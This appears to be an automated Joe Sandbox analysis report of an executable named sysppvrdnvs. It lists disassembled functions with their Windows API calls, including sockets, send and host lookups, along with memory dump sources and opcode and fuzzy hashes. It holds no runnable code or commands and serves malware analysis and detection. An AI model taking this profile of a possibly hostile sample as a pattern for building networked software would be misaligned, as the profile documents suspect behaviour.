                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$CloseCreateHandleSize
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1378416451-0
                                                                                                                                    • Opcode ID: 40331b06137dd1b3e9361709e89bde31eef538c005570258d90ec78dd49f2017
                                                                                                                                    • Instruction ID: 7e163f13d574deee43add6bab66e88a36a5285de070472799180e575aa2043d7
                                                                                                                                    • Opcode Fuzzy Hash: 40331b06137dd1b3e9361709e89bde31eef538c005570258d90ec78dd49f2017
                                                                                                                                    • Instruction Fuzzy Hash: A0F03774A40308FBDB20DFA4DC49FCD7B74EB04701F2082A4FA047B2D0D6B55A418B44
                                                                                                                                    Function 0040A760 Relevance: 3.1, APIs: 2, Instructions: 52memoryCOMMONLIBRARYCODE
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 0040A800: GetCurrentProcessId.KERNEL32(?,0040A76B,?,0040D07E,00000010,?,?,?,?,?,?,0040CDEB), ref: 0040A803
                                                                                                                                    • RtlAllocateHeap.NTDLL(02DE0000,?,-0000000C), ref: 0040A7AA
                                                                                                                                    • memset.NTDLL ref: 0040A7E4
                                                                                                                                      • Part of subcall function 0040A820: HeapCreate.KERNEL32(00000000,00000000,00000000,?,?,0040A777,?,0040D07E,00000010,?,?,?,?,?,?,0040CDEB), ref: 0040A84C
                                                                                                                                      • Part of subcall function 0040A820: HeapSetInformation.KERNEL32(02DE0000,00000000,00000002,00000004), ref: 0040A876
                                                                                                                                      • Part of subcall function 0040A820: GetCurrentProcessId.KERNEL32 ref: 0040A87C
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Heap$CurrentProcess$AllocateCreateInformationmemset
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3494217179-0
                                                                                                                                    • Opcode ID: fa29d78d3ce41ca275254412ae4d96764d92337fc642c65f72d4f93bbf2f11ac
                                                                                                                                    • Instruction ID: 5fdcc54cffe3c60a089a3a898bb23ed8061fd132f88873fc9f8ce54bcf899a2e
                                                                                                                                    • Opcode Fuzzy Hash: fa29d78d3ce41ca275254412ae4d96764d92337fc642c65f72d4f93bbf2f11ac
                                                                                                                                    • Instruction Fuzzy Hash: A71112B5D00208BBCB14EFA5DC45F9E7BB9AF44309F04C169F508AB381D638DA64CB99
                                                                                                                                    Function 0040DFD0 Relevance: 3.0, APIs: 2, Instructions: 49synchronizationCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 004013B0: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,0040DFDD,00000000), ref: 004013D5
                                                                                                                                      • Part of subcall function 004013B0: socket.WS2_32(00000002,00000002,00000011), ref: 004013E4
                                                                                                                                      • Part of subcall function 004013B0: bind.WS2_32(?,?,00000010), ref: 00401429
                                                                                                                                      • Part of subcall function 0040BBB0: EnterCriticalSection.KERNEL32(004165F8), ref: 0040BBC0
                                                                                                                                      • Part of subcall function 0040BBB0: LeaveCriticalSection.KERNEL32(004165F8), ref: 0040BBEC
                                                                                                                                    • InterlockedExchangeAdd.KERNEL32(00000000,00000000), ref: 0040DFFD
                                                                                                                                    • WaitForSingleObject.KERNEL32(000006BC,00001388), ref: 0040E047
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CriticalSection$CreateEnterEventExchangeInterlockedLeaveObjectSingleWaitbindsocket
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3920643007-0
                                                                                                                                    • Opcode ID: 18c62cc6d519b2e8afdf3871f58b5d287ebe97866f2e1beb6f2c6a56a98bb43e
                                                                                                                                    • Instruction ID: 346b0ed27967947cee21f80887d76a0c9fc99ab28eac90287f9a1883fefaa601
                                                                                                                                    • Opcode Fuzzy Hash: 18c62cc6d519b2e8afdf3871f58b5d287ebe97866f2e1beb6f2c6a56a98bb43e
                                                                                                                                    • Instruction Fuzzy Hash: C411A1B5E00208ABE704EBE5DC46FAF7735AB04704F14857AF501772D1E6B9AE50CB98
                                                                                                                                    Function 0040B780 Relevance: 3.0, APIs: 2, Instructions: 40networkCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • gethostname.WS2_32(?,00000100), ref: 0040B79C
                                                                                                                                    • gethostbyname.WS2_32(?), ref: 0040B7AE
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: gethostbynamegethostname
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3961807697-0
                                                                                                                                    • Opcode ID: 3e0d64d0359f05fd9a79bfd049c8ca7c81df9b12e882189b7266d53aab3380c0
                                                                                                                                    • Instruction ID: d19b970f4f05460fb5f23fa9ea20f915887bff4352c67af57008564f6b42df24
                                                                                                                                    • Opcode Fuzzy Hash: 3e0d64d0359f05fd9a79bfd049c8ca7c81df9b12e882189b7266d53aab3380c0
                                                                                                                                    • Instruction Fuzzy Hash: 64112E349042188BCB25DB14C844BD8B779EB65314F14C6DAD48967390C7F96DC5CF89
                                                                                                                                    Function 0040B3F0 Relevance: 3.0, APIs: 2, Instructions: 24networkCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: gethostbynameinet_addr
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1594361348-0
                                                                                                                                    • Opcode ID: 46542f40318f5cfb28b81fc8c4f0329da453caff3e113274fd4b0c2f7b1fac6b
                                                                                                                                    • Instruction ID: cf68f0f803e5ad204852fc960aab75f2335c53b4724a48f6e286a6dac7d73619
                                                                                                                                    • Opcode Fuzzy Hash: 46542f40318f5cfb28b81fc8c4f0329da453caff3e113274fd4b0c2f7b1fac6b
                                                                                                                                    • Instruction Fuzzy Hash: 84F0AC78900208EFCB14DFA4E54899DBBB4EB49311F2083A9E905673A0D7749E80DB84
                                                                                                                                    Function 0040B4F0 Relevance: 3.0, APIs: 2, Instructions: 11COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • shutdown.WS2_32(0040B4DD,00000002), ref: 0040B4F9
                                                                                                                                    • closesocket.WS2_32(0040B4DD), ref: 0040B503
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: closesocketshutdown
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 572888783-0
                                                                                                                                    • Opcode ID: 25f7de04c8b00f8f37ac4a6d3bc42f69888779e154306af29f6f284285fde8ae
                                                                                                                                    • Instruction ID: e588004495cc6a7b8ebd8d82ef2c96d96882889d66b7c68133776882e6b5d849
                                                                                                                                    • Opcode Fuzzy Hash: 25f7de04c8b00f8f37ac4a6d3bc42f69888779e154306af29f6f284285fde8ae
                                                                                                                                    • Instruction Fuzzy Hash: 39C04C7914020CBBCB549FE5EC4DDD97BACFB48751F108455FA098B251CAB6E9808B94
                                                                                                                                    Function 00409E70 Relevance: 2.7, APIs: 2, Instructions: 174COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 5199f4ac4ad430b340395b2c790eff018088729ef202642ee4bea641b12d0db6
                                                                                                                                    • Instruction ID: 9018fa89db39be4d923d705982bd5ace5360351e168daa38d33e5c0461b43902
                                                                                                                                    • Opcode Fuzzy Hash: 5199f4ac4ad430b340395b2c790eff018088729ef202642ee4bea641b12d0db6
                                                                                                                                    • Instruction Fuzzy Hash: 1181FA74A00219DBDB24CE18C885BE973B5FB44358F50C1AAE94DAB382D734AED5CF85
                                                                                                                                    Function 0040BBB0 Relevance: 2.5, APIs: 2, Instructions: 20COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • EnterCriticalSection.KERNEL32(004165F8), ref: 0040BBC0
                                                                                                                                    • LeaveCriticalSection.KERNEL32(004165F8), ref: 0040BBEC
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CriticalSection$EnterLeave
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3168844106-0
                                                                                                                                    • Opcode ID: 7b213cd4d069c01e8a620414b83cfb343b0676d070a872b63673a2a7234e7122
                                                                                                                                    • Instruction ID: 13b3a4f761e8e0ec39884722658b832f986ab9836cdaa210380d175f348a5a39
                                                                                                                                    • Opcode Fuzzy Hash: 7b213cd4d069c01e8a620414b83cfb343b0676d070a872b63673a2a7234e7122
                                                                                                                                    • Instruction Fuzzy Hash: A2E09AB0A41204EBCB00DF88FC09B983774E744304F1281B9E81453390EBB4EE80CA8D
                                                                                                                                    Function 0040B510 Relevance: 2.5, APIs: 2, Instructions: 9COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • EnterCriticalSection.KERNEL32(004165F8,?,0040BDA7), ref: 0040B518
                                                                                                                                    • LeaveCriticalSection.KERNEL32(004165F8,?,0040BDA7), ref: 0040B528
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CriticalSection$EnterLeave
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3168844106-0
                                                                                                                                    • Opcode ID: ad8263c65cb201d3706fc4fef9bb1207c721a47fd2d799970df71f2cf60a6b1c
                                                                                                                                    • Instruction ID: 14b8899719e1d7f6bd9f87e5ca311e10c022d8288dc76d62f5c8fe7294ca2835
                                                                                                                                    • Opcode Fuzzy Hash: ad8263c65cb201d3706fc4fef9bb1207c721a47fd2d799970df71f2cf60a6b1c
                                                                                                                                    • Instruction Fuzzy Hash: BDB09B701C1329B7810037D5BC0B7C43E29D544B1539380F6B51954195AEE555C0555D
                                                                                                                                    Function 0040CD40 Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • __aligned_recalloc_base.LIBCMTD ref: 0040CD67
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __aligned_recalloc_base
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3433095291-0
                                                                                                                                    • Opcode ID: dbefd875751898bb724e6a61a3d2bcd5d5b822f72dea74509c14001a8b862a7a
                                                                                                                                    • Instruction ID: faf6a6b27d618bda7eb0c01cb65bad9766fd1ccddcd1cd8bbdc964715fc70cc6
                                                                                                                                    • Opcode Fuzzy Hash: dbefd875751898bb724e6a61a3d2bcd5d5b822f72dea74509c14001a8b862a7a
                                                                                                                                    • Instruction Fuzzy Hash: 79F012F650010CABCB04DF99ED45D9B33ADAF4C308F048529F90C97381E679E950CBA5
                                                                                                                                    Function 0040AB60 Relevance: 1.5, APIs: 1, Instructions: 35memoryCOMMONLIBRARYCODE
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 0040A800: GetCurrentProcessId.KERNEL32(?,0040A76B,?,0040D07E,00000010,?,?,?,?,?,?,0040CDEB), ref: 0040A803
                                                                                                                                    • RtlFreeHeap.NTDLL(02DE0000,00000000,00402612,?,00402612,?), ref: 0040ABBB
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CurrentFreeHeapProcess
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3855406826-0
                                                                                                                                    • Opcode ID: 619bfd810e0c26ad7a8b13ecb3c60179b2854ed0b7b45a3f3579a8c95ad91858
                                                                                                                                    • Instruction ID: ab559ef0e8e170b551dfe54b009a4d3658c5c6bd361d46cd0bbc19687281446f
                                                                                                                                    • Opcode Fuzzy Hash: 619bfd810e0c26ad7a8b13ecb3c60179b2854ed0b7b45a3f3579a8c95ad91858
                                                                                                                                    • Instruction Fuzzy Hash: 2CF04474D00209ABDB04DF99D441D6DBBB6AB84304F14C1AAEA056B381EA35E951CB95
                                                                                                                                    Function 0040D710 Relevance: 1.5, APIs: 1, Instructions: 32networkCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • send.WS2_32(00000000,00000000,?,00000000), ref: 0040D72F
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: send
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2809346765-0
                                                                                                                                    • Opcode ID: 06370eea5684355e58e3ecca2704a58af4611f1d3e16c80e6b4b5217ad5f95b8
                                                                                                                                    • Instruction ID: e7aa79f816f91947af6fbc74e9c8fbfd3bb2dea631739c5f8479ec5b7c0f5cfd
                                                                                                                                    • Opcode Fuzzy Hash: 06370eea5684355e58e3ecca2704a58af4611f1d3e16c80e6b4b5217ad5f95b8
                                                                                                                                    • Instruction Fuzzy Hash: 58013C3890438DEFCB00DFA8C888BDE7BB4BB08314F1085A9EC55A7380D3B59699CB55
                                                                                                                                    Function 0040D930 Relevance: 1.5, APIs: 1, Instructions: 25synchronizationCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 0040BBB0: EnterCriticalSection.KERNEL32(004165F8), ref: 0040BBC0
                                                                                                                                      • Part of subcall function 0040BBB0: LeaveCriticalSection.KERNEL32(004165F8), ref: 0040BBEC
                                                                                                                                    • WaitForSingleObject.KERNEL32(000006BC,00001388), ref: 0040D95C
                                                                                                                                      • Part of subcall function 0040D550: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040D55C
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CriticalSection$EnterExchangeInterlockedLeaveObjectSingleWait
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3309573332-0
                                                                                                                                    • Opcode ID: dea414f55044976029bfea1705a47b8f4b0a5085fa57cca7b4be92acb39eaa1a
                                                                                                                                    • Instruction ID: 2ee0a3073efd4fba8235a9b1d7a198457ec1c10d5c824cc9a6b08d4439e9405f
                                                                                                                                    • Opcode Fuzzy Hash: dea414f55044976029bfea1705a47b8f4b0a5085fa57cca7b4be92acb39eaa1a
                                                                                                                                    • Instruction Fuzzy Hash: E3E092B1D40308A7C714E7E5A806BAF762A9710305F54407AF600762C1DA799A44D7DC
                                                                                                                                    Function 00407670 Relevance: 1.5, APIs: 1, Instructions: 23comCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • CoCreateInstance.OLE32(00000000,00000000,00004401,00000000,00000000), ref: 00407690
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateInstance
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 542301482-0
                                                                                                                                    • Opcode ID: 34e119f03330a37951e29d4ee19d5d58663b392051cfe4a9acefb3e3966ee614
                                                                                                                                    • Instruction ID: d29105fc803771725095f39a6bc68a1d0ed1c954ca33f5653c88c8c6fc3524cf
                                                                                                                                    • Opcode Fuzzy Hash: 34e119f03330a37951e29d4ee19d5d58663b392051cfe4a9acefb3e3966ee614
                                                                                                                                    • Instruction Fuzzy Hash: 07E0ED74D1020CFFDF00DF94C889BDEBBB8AB44315F1081A9E90567280D7B96A94CB95
                                                                                                                                    Function 00409CB0 Relevance: 1.4, APIs: 1, Instructions: 125COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: f585e5848d647f7ba98f44a578c3aab8627008f1611616fef22c9fd6c64d79f0
                                                                                                                                    • Instruction ID: 3330dfa097b842a7a488ec17b8b9c7df683748c841cce28906d8870d8e721c37
                                                                                                                                    • Opcode Fuzzy Hash: f585e5848d647f7ba98f44a578c3aab8627008f1611616fef22c9fd6c64d79f0
                                                                                                                                    • Instruction Fuzzy Hash: D9512B74600209EBDB04DF18C895FEA73A5FB48318F24857AE9299B382D735EE51CB84
                                                                                                                                    Function 00402540 Relevance: 1.3, APIs: 1, Instructions: 99COMMONLIBRARYCODE
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • memcpy.NTDLL(00000000,?,004024FF), ref: 004025F1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: memcpy
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3510742995-0
                                                                                                                                    • Opcode ID: 003a0e8c18067fecf3b08c50e852eb1bba0ba506ffdb6ae14e986818a952058c
                                                                                                                                    • Instruction ID: 64e9503c27af5828c57b21208a77217ab4b39b6faaaa4d03522f211e53aa4793
                                                                                                                                    • Opcode Fuzzy Hash: 003a0e8c18067fecf3b08c50e852eb1bba0ba506ffdb6ae14e986818a952058c
                                                                                                                                    • Instruction Fuzzy Hash: 7A41EAB9A00208EFCB04DF94C59199EBBB5FF49314F20C5A9E819AB381D735EE41DB85
                                                                                                                                    Function 0040C310 Relevance: 1.3, APIs: 1, Instructions: 90COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: memset
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2221118986-0
                                                                                                                                    • Opcode ID: 229a0221ec898bac06963efcfd6839d4a441ca8df59a2ebf4f072cbf2a2901ec
                                                                                                                                    • Instruction ID: e66e4651a1033cb0a1a859d50de709900647e4399b191a2d0bdb1657cb37730b
                                                                                                                                    • Opcode Fuzzy Hash: 229a0221ec898bac06963efcfd6839d4a441ca8df59a2ebf4f072cbf2a2901ec
                                                                                                                                    • Instruction Fuzzy Hash: FC412C79A00304DFC708EF44E881AAA7BB2FB4C324B16826DF9055B395D375E995CF98
                                                                                                                                    Function 0040A510 Relevance: 1.3, APIs: 1, Instructions: 86COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: b9a17e562121240b50e18342ff29bb7a47b48788b8a8a72522e6dd27721dde94
                                                                                                                                    • Instruction ID: 204a74d382af71bf333f3cbb89a072d8910a3b39e084b6e50900784b7b3b1d46
